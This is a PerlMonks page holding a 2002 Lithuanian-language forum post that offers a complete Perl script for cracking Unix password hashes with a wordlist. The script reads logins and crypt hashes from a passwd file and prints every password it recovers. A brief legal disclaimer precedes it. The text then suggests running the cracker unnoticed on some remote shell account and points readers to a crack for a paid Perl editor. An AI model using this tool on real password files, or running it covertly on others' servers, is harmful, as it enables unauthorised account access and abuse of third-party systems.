Beefy Boxes and Bandwidth Generously Provided by pair Networks
No such thing as a small change
 
PerlMonks  

comment on

( #3333=superdoc: print w/replies, xml ) Need Help??
<html> <head> <title>writting unix password cracker in perl</title> </head>
<body bgcolor="#FFFFFF" text="#000000"> ... as ...

data : 2002
autorius : mr2
Url : http://mr2lt.cjb.net
@mail : mr2@xxx.lt ( Sub : mr2-cgi )

... niekas nenorejo mirti ...

si informacija yra pazintinio tipo ... uz sios informacijos panaudojima
as ... kaip autorius neatsakingas ir tikrai nepritariu sios informacijos
panaudojimui nelegaliems reikaliukams ... taigi pries kazka
darydami ... pirma gerai pagalvokite ir tik po to darykite ...
tikiuosi pasirinksite teisinga kelia ;) ...

... apie ...

inete pilna unix password'u cracking irankiu ... vieni dirba po unix ... kiti
po win operacinem sistemom ... kodelgi mum patiem nepasidarius perl'inio
unix password cracking tool'zo ... ir jei turi shell'a (su cgi/perl) kaskur inete ...
kodelgi juo nepasinaudojus (zinoma tada kai jo prireikia ;) ) ... juk shell'o
privalumas yra tas kad tau nereikes istisa para palikinet ijunkto savo kompo
su paleistu unix password cracker'iu ... ir ziuret kad kasnors nesusidometu
paleistaja programa ...

... irankiai ...

si skiltis cia nereikalinga ... bet pamaniau pareklamuosiu nebloga
"Visual Perl Editor v2.5" programa leidziancia redaguoti skriptus parasytus
perl ... window$'uose ... nezinau kaip jum bet asmeniskai man taip patogiau
... ja galima tikrinti klaidas ... zodziu daryti su PERL skriptais viska ...
ka paprastai darau po linux ...

jei susidomejote ... jos adresas tinkle : http://kakoulidis.homepage.com/perl.html
(crack'o (tiksliau loader'io) paieskokit astalavistoj ... jis butinas ;) )

vos nepamirsau ... jum prireiks passwd bei wordlist'o ;)

... varom ...

------------------------------- cut there -------------------------------

# (tradiciskai) jusu perl'o vieta diske
#!/usr/bin/perl

# pradedam darba
print ("\npradedu ...\n");

# $slapt_sar=slaptazodziu failas (passwd)
$slapt_sar = "passwd.txt";

# $zod_sar=wordlistas su daugybe slaptazodziu (eiluteje po viena)
$zod_sar = "wordlist.txt";

# atidarom slaptazodziu faila ir isrenkame login'us bei koduotus slaptazodzius
open (PASWORDS,$slapt_sar) || die "neatidarau slaptazodziu failo !!!";
while (<PASWORDS>) {
($vardas,$koduotas,$uid,$gid,$cos,$home,$shell)=split( /:/);

# issaukiam funkcija kuri bando surasti tinkanti slaptazodi
&ieskot_passwd; }

# po viso darbo uzdarom slaptazodziu faila
close (PASWORDS);

# baigiam darba
print ("\nbaigta ...\n");
exit;

# na stai ir pati slaptazodziu ieskojimo funkcija
sub ieskot_passwd {

# atidarom wordlist'a
open (WORDLIST,$zod_sar) || die "neatidarau wordlist\'o !!!";

# imam visus jame esancias eilutes
@eilutes=<WORDLIST>;

# uzdarom wordlist'a
close (WORDLIST);

# imam po atskira eilute (is wordlist'o) ir nukertam 'LF' (eilutes pabaigos zenkla)
foreach $eilute (@eilutes) {
chomp($eilute);

# koduojam slaptazodi
$bandomasis=crypt($eilute,$koduotas);

# jei sugeneruotas kodas==tikrasis ... reiskias radom slaptazodi
if ("$bandomasis" eq "$koduotas") { print "\nradau: user $vardas password $eilute"; } }
}

------------------------------- cut there -------------------------------

... papildymai ...

aisku jus galit pakoreguot si skripta pvz : kad neradus ne vieno slaptazodzio ... skriptas
apie tai pranestu darbo pabaigoje ... uzrasytu gautus rezultatus i faila ... dar galima pakeisti
zodziu skaityma is wordlist'o ... nes siuo metodu visas zodinelis eina i atminti ... aisku gerai
jei zodinelis nedidelis ... bet paprastai taip nebuna ;) ... betkokiu atveju pradzia jau yra ... o
skripto tobulinimu uzsiimkite patys ... good luck ...

</body> </html>

In reply to writting unix password cracker in perl lithuanian language by mr2

Title:
Use:  <p> text here (a paragraph) </p>
and:  <code> code here </code>
to format your post; it's "PerlMonks-approved HTML": • Are you posting in the right place? Check out Where do I post X? to know for sure.
 • Posts may use any of the Perl Monks Approved HTML tags. Currently these include the following:
  <code> <a> <b> <big> <blockquote> <br /> <dd> <dl> <dt> <em> <font> <h1> <h2> <h3> <h4> <h5> <h6> <hr /> <i> <li> <nbsp> <ol> <p> <small> <strike> <strong> <sub> <sup> <table> <td> <th> <tr> <tt> <u> <ul>
 • Snippets of code should be wrapped in <code> tags not <pre> tags. In fact, <pre> tags should generally be avoided. If they must be used, extreme care should be taken to ensure that their contents do not have long lines (<70 chars), in order to prevent horizontal scrolling (and possible janitor intervention).
 • Want more info? How to link or or How to display code and escape characters are good places to start.
Log In?
Username:
Password:

What's my password?
Create A New User
Domain Nodelet?
Chatterbox?
and the web crawler heard nothing...

How do I use this? | Other CB clients
Other Users?
Others chanting in the Monastery: (5)
As of 2022-05-27 16:12 GMT
Sections?
Information?
Find Nodes?
Leftovers?
  Voting Booth?
  Do you prefer to work remotely?  Results (97 votes). Check out past polls.

  Notices?